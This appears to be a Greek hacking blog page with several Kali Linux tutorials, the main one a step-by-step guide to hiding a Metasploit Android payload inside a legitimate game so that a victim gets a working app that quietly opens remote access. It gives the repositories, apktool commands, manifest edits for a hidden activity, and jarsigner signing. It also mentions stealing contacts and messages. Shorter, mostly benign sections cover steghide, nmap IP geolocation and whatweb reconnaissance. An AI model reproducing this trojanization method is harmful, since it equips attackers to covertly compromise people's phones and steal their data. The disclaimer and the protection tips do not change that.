ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Δευτέρα 30 Νοεμβρίου 2015

Πως βαζουμε τον ιο μας σε οποιαδηποτε εφαρμογη Android (Advance Reverse Engineering)





Τι θα χρειαστειτε;

1.Kali Linux
2.Eclipse
3.Μια εφαρμογη Android


Σε προηγουμενο οδηγο μαθαμε πως να κανουμε εναν ιο για Android FUD (Fully Undetectable) και πως κλεβουμε επαφες,μηνυματα και κλησεις

Βεβαια το προβλημα ειναι οτι εφοσον το θυμα εκανε εγκατασταση του ιου μας μετα απο λιγο εκανε απεγκατασταση γιατι ο ιος σαν εφαρμογη δεν εδειχνε τιποτα στο θυμα.

Σε αυτο τον οδηγο θα μαθουμε πως βαζουμε τον ιο μας σε οποια εφαρμογη θελουμε

Πριν ξεκινησουμε πρεπει να κανουμε εγκατασταση του Eclipse

το Eclipse ειναι ενα προγραμμα το οποιο ειναι για προγραμματιστες εφαρμογων java,c++ κτλ

οποτε ας αρχισουμε

τρεχουμε την εντολη

apt-get install eclipse

οταν τελειωσουμε με την εγκατασταση γραφουμε στο τερματικο eclipse ωστε να μας ανοιξει


πηγαινουμε πανω αριστερα στην καρτελα Help και επιλεγουμε Install New Software

 

επιλεγουμε Add

στο Name βαζουμε Android και στο location

https://dl-ssl.google.com/android/eclipse/

επιλεγουμε τα πακετα ολα για εγκατασταση



 αποδεχομαστε τους ορους και επιλεγουμε να γινει εγκατασταση

οταν τελειωσει το eclipse το κλεινουμε και το ξανα ανοιγουμε
πηγαινουμε πανω δεξια στην καρτελα file και επιλεγουμε import
αν ολα ειναι ενταξει τοτε θα μας εμφανισει τον Android οπως κατω στην εικονα


τωρα εφοσον μπορουμε να εισαγουμε κωδικα εφαρμογης  Android στο Eclipse κατεβαζουμε τα εξεις

γραφουμε σε ενα τερματικο

cd Desktop

μετα

git clone https://github.com/nickthesail0r/AndroidPayload.git

και

git clone https://github.com/nickthesail0r/Metasploit-Binder.git


στην επιφανεια εργασιας μας θα δουμε 2 φακελους με τα ονοματα AndroidPayload και Metasploit-Binder

στο Eclipse επιλεγουμε πανω αριστερα File και Import

Android - Existing Android code into Workspace


 επιλεγουμε Browser και AndroidPayload


κανουμε και την ιδια διαδικασια με το metasploit-binder



στο Eclipse πρεπει να εχετε αυτα τα 2 Projects


πηγαινουμε στο AndroidPayload και με διπλο κλικ ανοιγουμε το Payload.java
και βαζουμε την ip και την θυρα που θελουμε να ακουει ο ιος μας

επιλεγουμε save και με δεξι κλικ πανω στο Project AndroidPayload επιλεγουμε export


επιλεγουμε Next


Εδω θα δημιουργησουμε το κλειδι της υπογραφης μας ωστε να υπογραφουμε τις εφαρμογες μας οποτε στο Location βαζουμε την τοποθεσια που θελουμε να αποθηκευτει και βαζουμε και κωδικο

 βαζουμε στο Allias το ψευδωνυμο μας ,κωδικο ,ποσα χρονια θελουμε να εχει η υπογραφη μας ισχυει και το ονομα μας


τελος βαζουμε το ονομα και την διαδρομη που θελουμε να αποθηκευτει η εφαρμογη μας


στην επιφανεια εργασια μας θα δουμε την εφαρμογη ios.apk

εδω ανοιγουμε το Armitage το βαζουμε να ακουει στην θυρα που βαλαμε στον ιο και τρεχουμε τον ιο στο κινητο μας

πρεπει να δουμε το κινητο σαν slave


(αν δεν σας εμφανιστει  τοτε εχετε κανει λαθος στην θυρα η στην ip)

τωρα απο το κινητο μας κανουμε εγκατασταση το ES Διαχειριστης Αρχειων


μετα επιλεγουμε την εφαρμογη που θελουμε να βαλουμε τον ιο μας

πχ εγω σε αυτο το παραδειγμα πηρα το παιχνιδι Space Agency



οταν το κανουμε εγκατασταση ανοιγουμε το ES

και επιλεγουμε app ,βρισκουμε το Space Agency και παταμε για 3 δευτερολεπτα πανω στο εικονιδιο μεχρι να μας εμφανιστει το ποιο κατω menu ωστε να το κανουμε backup

τωρα συνδεουμε με καλωδιο το κινητο με τον υπολογιστη, πηγαινουμε στον φακελο Phone/Backups/apps και μεταφερουμε το Space Agency στον υπολογιστη μας

οταν εχουμε το Space Agency στην επιφανεια εργασιας μας τοτε το κανουμε Decompliled με το apktool

οποτε τρεχουμε την εντολη
apktool.jar d "/root/Desktop/Space Agency_1.4.4.apk"
(η apktool αν εχετε την παλια εκδοση)


το apktool μας εκανε decompiled το Space Agency στην επιφανεια εργασιας
πηγαινουμε στον φακελο και ανοιγουμε το AndroidManifest.xml

σημειωνουμε το ονομα πακετου της εφαρμογης (package name) και της πρωτης δραστηριοτητας(Activity)

πχ


τωρα πηγαινουμε στο Eclipse στο Project Binder και ανοιγουμε το StartUpActivity,java και βαζουμε τα πακετα απο το AndroidManifest.xml


πχ


αποθηκευουμε και κανουμε export της εφαρμογης binder


παλι η ιδια διαδικασια


εκτος απο εδω που επιλεγουμε την υπογραφη που φτιαξαμε πριν
βαζουμε τον κωδικο


επιλεγουμε το ψευδωνυμο και βαζουμε κωδικο


βαζουμε το ονομα και την διαδρομη που θελουμε να εξαγουμε την εφαρμογη


τωρα εφοσον στην επιφανεια εργασιας εχουμε το binder.apk θα το κανουμε decompiled με το apktool

οποτε  τρεχουμε την εντολη

apktool.jar d /root/Desktop/Binder.apk


μετα θα κανουμε decompiled τον ιο

τρεχουμε την εντολη

apktool.jar d /root/Desktop/ios.apk


τωρα εφοσον και οι 3ς εφαρμογες εχουν γινει decompiled στην επιφανεια  εργασιας

πηγαινουμε σον φακελο ios/smali/com και αντιγραφουμε τον φακελο app

μετα πηγαινουμε στον φακελο Space Agency_1.4.4/smali/com/ και κανουμε επικολληση


πηγαινουμε στον φακελο Binder/smali/com/app και κανουμε αντιγραφη του φακελου bind

μετα πηγαινουμε παλι στον φακελο Space Agency_1.4.4/smali/com/app/ και κανουμε επικολληση



δλδ η εφαρμογη σας πρεπει να εχει μεσα τους φακελους bind και stage στην διαδρομη efarmoghsas/smali/com/app/

τωρα ανοιγουμε το AndroidManifest.xml στον φακελο ios και κανουμε αντιγραφη τα δικαιωματα (permissions)


στο AndroidManifest.xml του Space Agency τα κανουμε επικολληση



μετα τελος στο </activity>

προσθετουμε

<activity android:label="hello" android:name="com.app.stage.MainActivity" android:theme="@android:style/Theme.NoDisplay">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </activity>
<activity android:label="@string/app_name" android:name="com.app.bind.StartUpActivity" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>



και αφαιρουμε απο το κανονικο <activity>

στο <intent-filter>

<category android:name="android.intent.category.LAUNCHER"/>

με λιγα λογια να υπαρχει ενα LAUNCHER το οποιο θα το ξεκιναει τo StartUpActivity


τωρα αποθηκευουμε και κανουμε compiled την εφαρμογη με την εντολη

apktool.jar b '/root/Desktop/Space Agency_1.4.4'


και την υπογραφουμε με την εντολη

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/Desktop/ypografi '/root/Desktop/Space Agency_1.4.4/dist/Space Agency_1.4.4.apk' nickthesail0r


και ειμαστε ετοιμοι να στειλουμε την εφαρμογη στο θυμα μας

η εφαρμογη βρισκετε στην διαδρομη Space Agency_1.4.4/dist/

τωρα πως θα στειλετε στο θυμα την εφαρμογη μπορειτε να δειτε τον προηγουμενο οδηγο μου

οταν το θυμα τρεξει την εφαρμογη δεν θα καταλαβει τιποτα γιατι θα του τρεχει κανονικα η εφαρμογη


και εσεις θα δειτε το θυμα σας στο armitage


Θελω να ευχαριστησω τον theDoubleKay για τον κωδικα του binder και γενικα την βοηθεια του.

Πως θα προστατευτειτε;

1.Ποτε μην κανετε εγκατασταση εφαρμογων απο αγνωστες πηγες 
2.Παντα να εχετε καποιο antivirus στο κινητο σας
3.Οταν ειναι να κανετε εγκατασταση ακομα και  μιας εφαρμογης απο το playstore να κοιτατε αν εχει πανω απο 100 χιλιαδες ληψεις και αν ειναι πανω απο 30 μερες αν εχει κατω απο 30 μερες και εχει περιεργα δικαιωματα μην την κανετε εγκατασταση

Στεγανογραφία απόκρυψη αρχείων. (Steghide)



Τι θα χρειαστείτε;
1.Kali Linux



Το steghide είναι ένα εργαλείο το οποίο μας επιτρέπει να κάνουμε στεγανογραφία αρχείων.

Δηλαδή μπορούμε να κρύψουμε αρχεία μέσα σε άλλα , πχ: μπορούμε να κρύψουμε ένα έγγραφο κειμένου μέσα σε μία εικόνα χωρίς να φαίνεται κάτι και αν κάποιος προσπαθήσει να το εμφανίσει με τον παρακάτω τρόπο όπου θα δείτε, θα του ζητήσει ένα συνθηματικό το οποίο θα χρειάζεται να γνωρίζει ώστε να εμφανίσει το αρχικό περιεχόμενο.

Ανοίγουμε λοιπόν ένα τερματικό και πατάμε την εξής εντολή όπως βλέπετε και στην εικόνα : apt-get install steghide


Αφού λοιπόν εγκαταστήσαμε το παρακάτω εργαλείο (steghide) , πάμε  να δούμε τώρα πως θα το χρησιμοποιήσουμε.

Θα χρειαστούμε:
α) Εικόνα ή Αρχείο μουσικής (προτείνεται mp3)
β) Έγγραφο κειμένου

Λοιπόν ανοίγουμε το τερματικό και πατάμε :
steghide embed -cf sail0r.jpg -ef mystiki-sidagi.txt

Θα μας ζητήσει κωδικό , βάλτε εναν που θα θυμάστε γιατί θα το χρησιμοποιήσουμε στο να αποκρυπτογραφήσουμε το αρχείο και να δόυμε το περιεχομενό του.

*Τα κόκκινα γράμματα να τα αλλάξετε με βαση αρχεία όπου έχετε εσείς.



Αφού κρυπτογραφήσαμε με την μέθοδο της στεγανογραφίας το κρυφό έγγραφο μας , μέσα στην εικόνα , σβήνουμε το αρχικό .txt αρχείο και αφήνουμε μόνο την εικόνα.

Τώρα θα δούμε πώς θα αποκρυπτογραφήσουμε το περιεχόμενο της εικόνας.
Ανοίγουμε το τερματικό και πατάμε: steghide extract -sf sail0r.jpg


Μόλις πατήσουμε την εξής εντολή θα παρατηρήσουμε ότι θα μας ζητήσει έναν κωδικό , ο κωδικός είναι αυτός που ορίσαμε προηγουμένος. Μετά αυτομάτος θα μας κάνει αποσυμπίεση (Extract) το αρχείο το οποίο είχαμε κρύψει , με το ίδιο ακριβώς περιεχόμενο δεδομένων και ονοματολογία αρχείου.

*Θυμίζω το αρχείο sail0r.jpg θα το αλλάξετε σε αυτό που έχετε εσεις.


Τρίτη 17 Νοεμβρίου 2015

Πως βρισκουμε την φυσικη τοποθεσια μιας IP (Nmap Scripting Engine)



Τι θα χρειαστειτε;

1.Kali Linux


Το nmap ειναι ενα εργαλειο το οποιο σας επιτρεπει να ανιχνευσετε θυρες και υπηρεσιες απο μια ip
Επισης περιεχει διαφορα σκριπτακια τα οποια μπορειτε να τα χρησιμοποιησετε αναλογα με τις αναγκες σας

Εμεις θελουμε να εντοπισουμε μια ip στην φυσικη της τοποθεσια

Οποτε ανοιγουμε ενα τερματικο και γραφουμε

nmap -Pn --script=ip-geolocation-geoplugin <Ip που θελετε>

και τα αποτελεσματα


για περισσοτερα σχετικα με Nmap Scripting Engine κοιταξτε εδω

Πρεπει να γνωριζετε οτι η ip εντοπιζετε μεχρι τον παροχο που την δινει και οχι μεχρι τον χρηστη.Γενικοτερα αυτη η μεθοδος σας βοηθαει να δειτε  σε ποια χωρα ειναι αυτη η ip και περιπου σε ποια πολη.

Πως βλεπουμε γρηγορα βασικα στοιχεια απο μια ιστοσελιδα



Τι θα χρειαστειτε;

1.Kali Linux

Μερικες φορες θελουμε να κανουμε μια γρηγορη αναγνωριση σε μια ιστοσελιδα
Το εργαλειο που θα μας βοηθησει σε αυτο ειναι το whatweb

Η ιστοσελιδα θα ειναι http://www.sail0r.wc.lt

πχ

ανοιγουμε ενα τερματικο και γραφουμε whatweb

και βλεπουμε ολες τις επιλογες


οποτε τωρα γραφουμε

whatweb www.sail0r.wc.lt

 οπως βλεπετε το whatweb βρηκε ip ,server ,τιτλο κτλ

για να δουμε αναλυτικα τα αποτελεσματα και να τα αποθηκευσουμε για περετερων αναλυση
πχ εγω θελω να τα αποθηκευσω ωστε να τα διαβασω με το magictree


γραφουμε

whatweb www.sail0r.wc.lt -v --log-magictree=/root/Desktop/spatoula

στο τερματικο θα δουμε

και


τωρα εφοσον τα αποθηκευσαμε θα τα ανοιξουμε με το magitree

γραφουμε σε ενα τερματικο magitree

θα μας εμφανιστει αυτο

 και


μετα επιλεγουμε file - open και βαζουμε το αρχειο που αποθηκευσαμε απο το whatweb

θα δειτε οτι δημιουργηθηκε  ενα Branch(κλαδι) με ονομα tesdata αν το πατησετε θα δειτε τις πληροφοριες που μαζεψε το what web

*ενα προβλημα που μπορει να εχετε με το magitree ειναι η εμφανιση των καρτελων οποτε καλυτερα να μεταφερε τις καρτελες ετσι

τωρα διορθωνετε μερικα notes πχ εκει που λεει host εχει την μορφη %5Β"κτλ
οποτε παταμε διπλο αριστερο κλικ και το διορθωνουμε για να αποθηκευτει παταμε το πληκτρο enter,με δεξι κλικ επιελγουμε στο note οs delete γιατι το εχει 2 φορες

πχ

το magitree περα οτι σας ταξινομει τις πληροφοριες
μπορει να χρησιμοποιησει διαφορα εργαλεια μεσω της κονσολα του
το οποιο θα καλυψουμε σε αλλο οδηγο